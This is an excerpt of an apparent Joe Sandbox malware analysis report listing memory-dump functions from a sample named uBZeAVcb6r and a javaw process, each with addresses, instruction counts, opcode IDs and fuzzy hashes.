                                                                                      • Source File: 00000000.00000002.522936834.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_12bd000_uBZeAVcb6r.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dbaeb3cf35ab750166e6983bf4275e3363cef8beb01fa6dd1559f3896d7560a9
                                                                                      • Instruction ID: 304442b4ffb45eb5cbab901faabf76d45467b9e852c099f69c75806dda6d16d4
                                                                                      • Opcode Fuzzy Hash: dbaeb3cf35ab750166e6983bf4275e3363cef8beb01fa6dd1559f3896d7560a9
                                                                                      • Instruction Fuzzy Hash: E7212475510248DFDB05CF58C9C0BD6BF75FB84368F24C569D9090B206C33AE855CAA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 012CD3C8 Relevance: .1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.523168916.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_12cd000_uBZeAVcb6r.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c314932792e4437b3108e78545097a39b1d9e71b477697c86bbacd481d6d0951
                                                                                      • Instruction ID: 3593fe168bdb43bf244deadf9c08135191f8be6e4b734efb31192996ab799527
                                                                                      • Opcode Fuzzy Hash: c314932792e4437b3108e78545097a39b1d9e71b477697c86bbacd481d6d0951
                                                                                      • Instruction Fuzzy Hash: BE212575114248DFDB21CF58D9C0B56FB65FB84B24F24C67DDB090B242C37AE446CAA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 012CD2E8 Relevance: .1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.523168916.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_12cd000_uBZeAVcb6r.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 955161beb04997de0fec03227c994fa82fe8b5b0501f6e1570e9a47e7eae0f1b
                                                                                      • Instruction ID: e417e9900298957b1d321eee84518a8cf572a56c7a1f14c6063bd986de7a8a1f
                                                                                      • Opcode Fuzzy Hash: 955161beb04997de0fec03227c994fa82fe8b5b0501f6e1570e9a47e7eae0f1b
                                                                                      • Instruction Fuzzy Hash: 24213475614248DFDB01CF58D9C0B2ABB65FB84B24F24C67EDA090B242C37AD802CAE1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 012CD1E8 Relevance: .1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.523168916.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_12cd000_uBZeAVcb6r.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0e589b2050506e1e14db42440d84233722f82808627c1f197b19018f949531db
                                                                                      • Instruction ID: 0baeee4b2b340414c8b87a6cd93be0c57e08cae52635e11c485130dd5da3402f
                                                                                      • Opcode Fuzzy Hash: 0e589b2050506e1e14db42440d84233722f82808627c1f197b19018f949531db
                                                                                      • Instruction Fuzzy Hash: 622106755142489FDB01CF58C9C0B16FB66FB84724F24CA7DDA094B247C376D846CAA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 012CD030 Relevance: .1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.523168916.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_12cd000_uBZeAVcb6r.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e02d91967eba0322b9bcd6ca12d07723676138def14f2cd25af7d01ee8e9effd
                                                                                      • Instruction ID: 3ff0c5bdd18d23b8e20c07b12fa68c76712abcd1d00ecde1db393cfbbb6b6e43
                                                                                      • Opcode Fuzzy Hash: e02d91967eba0322b9bcd6ca12d07723676138def14f2cd25af7d01ee8e9effd
                                                                                      • Instruction Fuzzy Hash: ED216475214248EFDB11CF5CC9C0B26BBA1FB84714F24C67EDA090B242C37BD842CAA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 012BD4FB Relevance: .1, Instructions: 56COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.522936834.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_12bd000_uBZeAVcb6r.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4e78fb41457c0dbc2d9524af8796639b843feda46be7989836c0fd150c2e2370
                                                                                      • Instruction ID: 635b2815672f53ee6a8952f3ea98d4703211ef88e01832d5f04a58f237aede40
                                                                                      • Opcode Fuzzy Hash: 4e78fb41457c0dbc2d9524af8796639b843feda46be7989836c0fd150c2e2370
                                                                                      • Instruction Fuzzy Hash: 9F11E176404284CFDB12CF14D9C0B96BF71FB84328F2886A9D9450B216C33AD45ACBA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 012BD40F Relevance: .1, Instructions: 56COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.522936834.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_12bd000_uBZeAVcb6r.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4e78fb41457c0dbc2d9524af8796639b843feda46be7989836c0fd150c2e2370
                                                                                      • Instruction ID: 87813a4bfe9a8d565a9b32fa301335f687595e576c6861dd9880f766b26b752a
                                                                                      • Opcode Fuzzy Hash: 4e78fb41457c0dbc2d9524af8796639b843feda46be7989836c0fd150c2e2370
                                                                                      • Instruction Fuzzy Hash: AA110676404284CFCB12CF54D9C0B96BF71FB84324F28C6A9D9440B616C33AE456CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 012CD02B Relevance: .1, Instructions: 53COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.523168916.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_12cd000_uBZeAVcb6r.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4a40b480d4fa50119ebda35aff352db3dffa7348ebbf36f966237d5faf07d1e9
                                                                                      • Instruction ID: 0f8e32f81f6d8d4b0d9732ad5741b83e96630a8a20fde631f34b22cf483807e4
                                                                                      • Opcode Fuzzy Hash: 4a40b480d4fa50119ebda35aff352db3dffa7348ebbf36f966237d5faf07d1e9
                                                                                      • Instruction Fuzzy Hash: 0711BE75504284CFDB12CF58D9C0B15BB61FB84714F28C6AEDA494B656C33AD44ACBA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 012CD3C3 Relevance: .1, Instructions: 53COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.523168916.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_12cd000_uBZeAVcb6r.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c66de853c8f73773a024d6556376e3cc26eafd671a5abed216511fd7aaf48c7a
                                                                                      • Instruction ID: a0477e5d245abff0186156a08022224fc7c2fa1a7ebee5717d798dffb10bd950
                                                                                      • Opcode Fuzzy Hash: c66de853c8f73773a024d6556376e3cc26eafd671a5abed216511fd7aaf48c7a
                                                                                      • Instruction Fuzzy Hash: C411D076504284CFDB12CF14D9C0B55FB71FB84724F28C6AEDA494B646C33AE44ACB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 012CD2E3 Relevance: .1, Instructions: 53COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.523168916.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_12cd000_uBZeAVcb6r.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c66de853c8f73773a024d6556376e3cc26eafd671a5abed216511fd7aaf48c7a
                                                                                      • Instruction ID: 615e2f95097a216b8ef5562da57348dec992f53dcb7202850a6d285738b00395
                                                                                      • Opcode Fuzzy Hash: c66de853c8f73773a024d6556376e3cc26eafd671a5abed216511fd7aaf48c7a
                                                                                      • Instruction Fuzzy Hash: 2C119076504284DFDB12CF54D9C4B19BF61FB84724F28C6AED9484B646C33AD446CFA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 012CD1E3 Relevance: .1, Instructions: 53COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.523168916.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_12cd000_uBZeAVcb6r.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4a40b480d4fa50119ebda35aff352db3dffa7348ebbf36f966237d5faf07d1e9
                                                                                      • Instruction ID: 035a7394eae46d487a16d1362ae8d562bdcbf089b7eaba6402e989d65ac10185
                                                                                      • Opcode Fuzzy Hash: 4a40b480d4fa50119ebda35aff352db3dffa7348ebbf36f966237d5faf07d1e9
                                                                                      • Instruction Fuzzy Hash: F5110076504284CFDB02CF54C9C4B15BFA2FB84724F28C6AEDA494B257C33AD44ACB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      Function 0131F350 Relevance: .3, Instructions: 315COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.523638964.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1310000_uBZeAVcb6r.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 87d4f64635f48e7f419af3a0132c9c7cdb63c6f2f22387a4c806aceafda18b21
                                                                                      • Instruction ID: 29e5ebea10fa1e7d45738fcb3b1a9cfbc13f3f508ae103c7c98bec511a0cd444
                                                                                      • Opcode Fuzzy Hash: 87d4f64635f48e7f419af3a0132c9c7cdb63c6f2f22387a4c806aceafda18b21
                                                                                      • Instruction Fuzzy Hash: 6012B7F9C117468BE332CF65E9981893BB9F745328F904308D2616FAD9DBB4254ACF44
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0131CD54 Relevance: .3, Instructions: 265COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.523638964.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1310000_uBZeAVcb6r.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bc5ccb70563471d9b062f48ef6fee84b827edda12a19266fd6eb3a1b2f028666
                                                                                      • Instruction ID: 22dd6aaea724d10663463d6a88830628451d630967ac3da85fcebe4f104da306
                                                                                      • Opcode Fuzzy Hash: bc5ccb70563471d9b062f48ef6fee84b827edda12a19266fd6eb3a1b2f028666
                                                                                      • Instruction Fuzzy Hash: 1DA17236E0021A8FCF19CFA9C8445DEBBB6FF84305B15857AE905BB225EB31E955CB40
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0131F340 Relevance: .2, Instructions: 223COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.523638964.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1310000_uBZeAVcb6r.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e74e33303bec94b7bfc0981a10a8d99b9f87452f6fc66ff4be19a79ecf7b0f1a
                                                                                      • Instruction ID: e13365679db99200c3b9152e4a8e2f732325a9733e065abdee8502db5366d901
                                                                                      • Opcode Fuzzy Hash: e74e33303bec94b7bfc0981a10a8d99b9f87452f6fc66ff4be19a79ecf7b0f1a
                                                                                      • Instruction Fuzzy Hash: 41C12BB9C117468BE732CF69E8881893B79FB85328F504309D1616B6D9DFB4358ACF84
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      Function 161FFED0 Relevance: .1, Instructions: 56COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000003.279100813.00000000161FC000.00000004.00000020.00020000.00000000.sdmp, Offset: 161FC000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_3_161fc000_javaw.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2e77d296e862b8bcc080c6255fc2b845d74065945f18ecdf42744c6048f25339
                                                                                      • Instruction ID: 27c12d009d02ed91f7050bb21c67e770e8db950409dde52addd3ba0478b79a35
                                                                                      • Opcode Fuzzy Hash: 2e77d296e862b8bcc080c6255fc2b845d74065945f18ecdf42744c6048f25339
                                                                                      • Instruction Fuzzy Hash: F701D9A284E7D18FC7438B7888A22817F709E6722470A00D3D4C0CF4A7E589485FC762
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%